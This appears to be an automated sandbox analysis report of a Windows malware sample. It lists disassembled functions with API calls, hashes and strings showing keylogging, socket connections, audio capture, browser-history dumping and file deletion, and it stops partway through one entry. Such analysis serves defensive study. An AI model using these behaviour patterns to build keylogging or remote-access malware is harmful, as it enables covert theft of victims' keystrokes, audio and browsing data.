                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                  • String ID: XCG$`AG$>G
                                                  • API String ID: 2334542088-2372832151
                                                  • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction ID: 66e347c5456f9a77f6dbed42a7107cccd1e393b4c525f7e1c372ebab81aa41fb
                                                  • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction Fuzzy Hash: 9E5123312883405FD3A9F724D860AEF7396AFE4300F50492DDB4A47594EF345E4ADE55
                                                  Function 020F44F3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • connect.WS2_32(?,00000000,00000000), ref: 020F450C
                                                  • WSAGetLastError.WS2_32(?,?,?,020F1B92), ref: 020F464E
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $TLS Handshake... |
                                                  • API String ID: 227477821-1510355367
                                                  • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                  • Instruction ID: 6d1249e49701d63c0008f14d4d99167024abe107503d6004743562d05d12d1e3
                                                  • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                  • Instruction Fuzzy Hash: 01415670BC0701BF8A85B7BC8C466AE7A97BB41340B40016ADF0143E91FF5198649FEB
                                                  Function 02106863 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,0046BA00,00000000,00000000,00000000), ref: 021068C3
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • Sleep.KERNEL32(00000064), ref: 021068EF
                                                  • DeleteFileW.KERNEL32(00000000), ref: 02106923
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t
                                                  • API String ID: 1462127192-3161277685
                                                  • Opcode ID: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                  • Instruction ID: c0241350ab6d9c011de7eff46a26bb2aa3feff10e5e755c52f3fc4b9ee172391
                                                  • Opcode Fuzzy Hash: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                  • Instruction Fuzzy Hash: 553194319803089EDB98FB60DC91EEE773AEF10304F004065EB06678D4EF646A8ADE95
                                                  Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$8>G
                                                  • API String ID: 368326130-2663660666
                                                  • Opcode ID: 990f793d9491b182eef5782c80c469aeda964fb7442a3231b80520572f45cea7
                                                  • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                  • Opcode Fuzzy Hash: 990f793d9491b182eef5782c80c469aeda964fb7442a3231b80520572f45cea7
                                                  • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                  Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                  • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                  • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: e4b3cc794dd4dc82af17be615720d717cdc228e4dcc969415cabf8effd0a7ef5
                                                  • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                  • Opcode Fuzzy Hash: e4b3cc794dd4dc82af17be615720d717cdc228e4dcc969415cabf8effd0a7ef5
                                                  • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                  Function 020FAADD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 020FAAEB
                                                  • wsprintfW.USER32 ref: 020FAB6C
                                                    • Part of subcall function 020F9FBF: SetEvent.KERNEL32(00000000,?,00000000,020FAB83,00000000), ref: 020F9FEB
                                                  Strings
                                                  • [%04i/%02i/%02i %02i:%02i:%02i , xrefs: 020FAAF4
                                                  • Offline Keylogger Started, xrefs: 020FAAE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
                                                  • API String ID: 1497725170-184404310
                                                  • Opcode ID: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                  • Instruction ID: 6d6634266dd584deb4a8824bcd29f3af10f901af6c22c43107ce0842f30fbbd6
                                                  • Opcode Fuzzy Hash: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                  • Instruction Fuzzy Hash: 0711B673444218BECB58FB54EC50CFE77BEEE48311B00002AF90256584FF78AA85DAA4
                                                  Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                  • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                  • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 1ea656b2c3fb8bac4f5f56c22ee55bbacf92cc14a274965a5590b27fc2444f83
                                                  • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                  • Opcode Fuzzy Hash: 1ea656b2c3fb8bac4f5f56c22ee55bbacf92cc14a274965a5590b27fc2444f83
                                                  • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                  Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                  • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                  • __dosmaperr.LIBCMT ref: 0044AAFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID: `@
                                                  • API String ID: 2583163307-951712118
                                                  • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                  • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                  • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                  Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404946
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 34c26403a1d925ecd11954548bb519a5dc401319f2b3b545c2e0a368bcefaf88
                                                  • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                  • Opcode Fuzzy Hash: 34c26403a1d925ecd11954548bb519a5dc401319f2b3b545c2e0a368bcefaf88
                                                  • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                  Function 020F4B7C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 020F4BAD
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 020F4BFB
                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 020F4C0E
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 020F4BC3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                  • Instruction ID: 33efbf68f6339bf734b1188f846aaae02ee7652e6743bb32509fb17bb5487265
                                                  • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                  • Instruction Fuzzy Hash: A7112071A443643BC751AB7A8808BCF7FA8AF86360F000066EA0942582DBB49085DBF6
                                                  Function 0210A6CA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0210B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3D3
                                                    • Part of subcall function 0210B3C2: IsWow64Process.KERNEL32(00000000,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3DA
                                                    • Part of subcall function 0210277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0210279E
                                                    • Part of subcall function 0210277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 021027BB
                                                    • Part of subcall function 0210277A: RegCloseKey.ADVAPI32(?), ref: 021027C6
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210A740
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-214125106
                                                  • Opcode ID: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                  • Instruction ID: bfd271c5cafd32a8c3ed1538965b58b59d43eff98009d0ad5c005b8e6d4ba07a
                                                  • Opcode Fuzzy Hash: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                  • Instruction Fuzzy Hash: 4B115960A803012ED704B374DC8BEAF366BDB90300F544539AA01931C1EBA49E469BE9
                                                  Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 5b19e5ba9062c404f279f3250fb80d0aa27bbf62a4bae84bdb253fcab457f044
                                                  • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                  • Opcode Fuzzy Hash: 5b19e5ba9062c404f279f3250fb80d0aa27bbf62a4bae84bdb253fcab457f044
                                                  • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                  Function 004016E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(005A2560,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                  • waveInAddBuffer.WINMM(005A2560,00000020,?,00000000,00401913), ref: 0040175D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: T=G$`%Z
                                                  • API String ID: 2315374483-470489524
                                                  • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                  • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                  Function 020F194F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(`%Z,00000020,00475BF4,00475BF4,00000000,00475B70,00473EE8,?,00000000,020F1B7A), ref: 020F19AE
                                                  • waveInAddBuffer.WINMM(`%Z,00000020,?,00000000,020F1B7A), ref: 020F19C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: T=G$`%Z
                                                  • API String ID: 2315374483-470489524
                                                  • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction ID: 861a074bf01736987d1ca7e2e2781c32e554cb86b343ce0fe89868bda4240ce5
                                                  • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction Fuzzy Hash: FD01A271341314AFD7509F28EC44EA5BBBAFB49315B014539F909C3B61EB31AC54AB98
                                                  Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                  • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                  • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                  • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                  Function 02132840 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,0045BCE0,00000000,?,?,?,021327F1,00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002), ref: 02132860
                                                  • GetProcAddress.KERNEL32(00000000,0045BCF8), ref: 02132873
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,021327F1,00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002), ref: 02132896
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: #v
                                                  • API String ID: 4061214504-554117064
                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction ID: 5e0e35a0e2a76e0d5ff80f3186e68391565ff84105212ad4a9832e17b877477a
                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction Fuzzy Hash: CEF0A430A44209FBCB16AFA0EC09B9EBFB5EB04716F0000F9FC05A2151CF749940CA98
                                                  Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                  • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                  • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 1818849710-27424756
                                                  • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                  • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                  Function 02102939 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 02102948
                                                  • RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 02102970
                                                  • RegCloseKey.ADVAPI32(004655B0,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,020F7C44,00000001), ref: 0210297B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 1818849710-27424756
                                                  • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction ID: 0cb14d5614d3bcdf50d7c63fdbfc3bdfb788b542ac94c10bed2cb6daca900b4f
                                                  • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                  • Instruction Fuzzy Hash: EEF09032580214FFDB019FA0EC55EEE376DEF00B50F144124BE06A61A1EB71DE04EA50
                                                  Function 020F1FF8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID: T=G$T=G$wkE
                                                  • API String ID: 3519838083-2195589345
                                                  • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction ID: 1e26a5473d8f755ae4b769ca73fd8e4989785d27d133237046c5e782ffdae985
                                                  • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction Fuzzy Hash: B0F05071B403107FC794FB24880069D7775DB41314F10C12A9E1477650CB394D00EB61
                                                  Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
